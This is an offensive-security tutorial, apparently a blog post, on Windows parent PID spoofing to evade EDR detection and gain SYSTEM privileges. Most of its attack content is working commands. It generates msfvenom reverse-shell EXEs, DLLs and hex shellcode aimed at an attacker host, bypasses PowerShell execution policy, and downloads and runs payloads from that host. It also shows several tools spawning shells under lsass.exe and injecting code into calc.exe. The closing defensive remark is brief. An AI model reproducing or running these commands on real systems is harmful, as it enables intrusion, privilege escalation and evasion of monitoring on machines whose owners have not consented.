Parent PID spoofing is an access token manipulation technique that may aid an attacker to evade defense techniques such as heuristic detection by spoofing PPID of a malicious file to that of a legitimate process like explorer.exe. The spoofing can be executed by using native API calls that may aid an attacker in explicitly specifying the PID like CreateProcess call in C++. This explicit assignment may also have certain side benefits as we will see in this article.
MITRE TACTIC: Privilege Escalation (TA0004) and Defence Evasion (TA0005)
MITRE TECHNIQUE ID: T1134 (Access Token Manipulation)
SUBTITLE: Parent PID Spoofing (T1547.009)
Child process monitoring is one of the most common attributes in threat hunting. A threat hunter may analyze that if a conhost.exe or cmd.exe process has been spawned from a zero-relation tool like Adobe Reader or MS Excel, it may indicate a potential compromise. AV solutions monitor this behavior under heuristic detection and alert the admin.
Parent PID spoofing counters that detection. PPID method tries to trick an AV/EDR solution into thinking that a legit process like lsass.exe has spawned that activity. It does that by spoofing the PID of the process to match that of its parent. Another great side benefit that may come along with this method is privilege escalation if the parent process is running with SYSTEM privileges, then by virtue of inheritance of access tokens, its child process has the same SYSTEM rights too.
Process: In Windows, applications comprise of one or more processes. In simpler terms, a part of the current running program is known as a process. It is possible that different applications may use same process (like cmd.exe) and for ambiguity, an integer is assigned to differentiate one process from the other. This integer is known as a PID.
PID: Stands for Process Identifier (PID) which is a numeric representation of the process running. GetCurrentProcessID() function in Windows that returns the PID of a process specified.
Parent Process: Parent processes are the processes that can spawn multiple child processes. For example, the command explorer.exe /root,”C:\Windows\System32\cmd.exe” shall spawn cmd.exe as a child process to parent explorer.exe. In code, parents may use fork() system call to spawn the child.
PPI: Stands for Parent Process Identifier (PPID) which is a numeric representation given to a parent process. Any process that has child process qualifies to be in a parent-child relationship.
Didier Stevens originally talked about this method in the post here. The code has since been unavailable to many geolocations but luckily, it is downloadable via waybackmachine on this link. Please note that you need to rebuild this EXE if you are using later versions of Visual Studio. In Visual Studio 2022, I removed SelectMyParent.pdb files in debugging and release folder and rebuilt the project to make it running.
At the admin end, you see explorer.exe running on PID 3808.
Thus, to spawn our very own binary under this parent explorer.exe, we can use SelectMyParent.exe like this and you’d see a new process created on the PID mentioned in the output.
SelectMyParent.exe notepad 3808
Upon inspecting in process explorer we can see notepad launched on port 1168
Likewise, we can run our own EXE too. Let’s create one exe using msfvenom first and upload the file using python3 web server
msfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=192.168.0.89 LPORT=1337 > shell.exe python3 -m http.server 80
While using a compromised terminal, one can view the processes running using tasklist command
In the list, you can see lsass.exe process running on port 644 as NT AUTHORITY\SYSTEM
So, I’ll run the SelectMyParent.exe by specifying the shell I uploaded and PID of lsass.exe
SelectMyParent.exe shell.exe 644
As you can see, on port 1337, I receive a callback as NT AUTHORITY\SYSTEM indicating that privileges have been escalated!
F-Secure labs created an alternate to Didier’s binary in powershell. They are using the same process as followed by Didier but the main difference is that a child process with injected DLL can be spawned as a child making it powerful. This injection is done by spoofing PID. The code can be downloaded here. Further, on a compromised system, an attacker must observe desired PID using a tasklist. Here, we are choosing Powershell as a parent with PID 3488
Now, we will use msfvenom to create our own DLL which will be injected in the process
msfvenom -p windows/x64/shell_reverse_tcp exitfunc=thread LHOST=192.168.0.89 LPORT=1234 -f dll > shell.dll
Now, we need to upload the powershell script and run the following command:
Import-Module .\PPID-Spoof.ps1 PPID-Spoof -ppid 3488 -spawnto "C:\Windows\System32\notepad.exe" -dllpath shell.dll
As you can see, it worked and a reverse shell received
This way, a notepad.exe with injected code (given by DLL) has been spawned as a child to powershell.exe process on PPID 3488
Decoder-it developed a powershell script based on the guidelines provided by Didier Stevens. By using the CreateProcessFromParent() method, psgetsystem script which can be found here, can be used to spawn child process by PID Spoofing. First, we note the PID of our desired process. Here, lsass.exe
Now, we can run the script in powershell like:
powershell -ep bypass wget 192.168.0.89/psgetsys.ps1 -O psgetsys.ps1 Import-Module .\psgetsys.ps1 [MyProcess]::CreateProcessFromParent(636,"C:\Users\Public\shell.exe","")
At the admin end, we can see that a shell.exe has been spawned from lsass.exe process
And as a result, a reverse shell has been received.
py7hagoras developed the GetSystem project which is a C# implementation of the same technique we discussed which could be found here.
We simply need to upload this on the victim system and provide path of the malicious file as argument 1 and name of the process which is to be spoofed as argument 2
powershell wget 192.168.0.89/GetSystem.exe -O GetSystem.exe GetSystem.exe shell.exe -O lsass
Now the tool will automatically find the PID of the process provided as the argument and automatically run the shell
At the admin end, we can see that shell.exe has been spawned as a child process of the lsass process.
Chirag Savla developed a great tool called “ProcessInjection” in C# that can perform a number of functions including Process Injections by PID spoofing. By providing a valid PID, the tool tries to use native API calls like CreateProcess to spoof PID and then inject code in them. The tool supports hex, C and base64 shellcode input and also, DLL injections are an option too by utilizing the same method. This can be downloaded here.
First, we need to create a hexadecimal shellcode of a reverse_tcp payload using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp exitfunc=thread LHOST=192.168.0.89 LPORT=1234 -f hex > hex.txt
Now that we have made our shellcode, in the victim system we can run the tool. Note that the tool takes in many flags as input based on the action to be performed which can be viewed just by typing “ProcessInjection.exe”
To run shellcode injection in a process, we use the following flags:
/ppath: process path of an EXE that is being targeted
/path: path of the shellcode to be inserted in the targeted exe
/parentproc: EXE targeted shall be spawned under this process
/f: filetype
/t: attack type. Here, /t:1 is a Vanilla Process Injection
powershell wget 192.168.0.89/hex.txt -O hex.txt powershell wget 192.168.0.89/ProcessInjection.exe -O ProcessInjection.exe ProcessInjection.exe /ppath:"C:\Windows\System32\calc.exe" /path:"hex.txt" /parentproc:explorer /f:hex /t:1
As desired, calc.exe has been loaded with our provided shellcode under the explorer.exe process
And, as expected a reverse shell has been received!
Now, the same tool can also be used to inject DLLs in the desired exe using calls like VirtualAllocEx and WriteProcessMemory.
We first need to create our DLL using msfvenom
msfvenom -p windows/x64/shell_reverse_tcp exitfunc=thread LHOST=192.168.0.89 LPORT=1234 -f dll > shell.dll
Now, we can use ProcessInjection.exe with /t:2 for DLL injections to target calc.exe and injecting shell.dll in it like:
ProcessInjection.exe /ppath:"C:\Windows\System32\calc.exe" /path:shell.dll /parentproc:explorer /t:2
As expected a reverse shell has been received upon successful execution of the DLL
Upon inspecting processes in the admin system using process explorer we see that explorer.exe has a child calc.exe which in turn in running our DLL using rundll library
The technique is being widely used by attackers to conduct stealthy operations and increase threat hunters round about time to detect the Indicators of Compromise. Many EDR solutions that are rather outdated and unpatched can be easily evaded using this technique. Through this article we intend to emphasize upon the importance of keeping updated EDR solutions in organisations and using smart detection features in good products that can catch such techniques. Hope you liked the article. Thanks for reading.
Author: Harshit Rajpal is an InfoSec researcher and left and right brain thinker. Contact here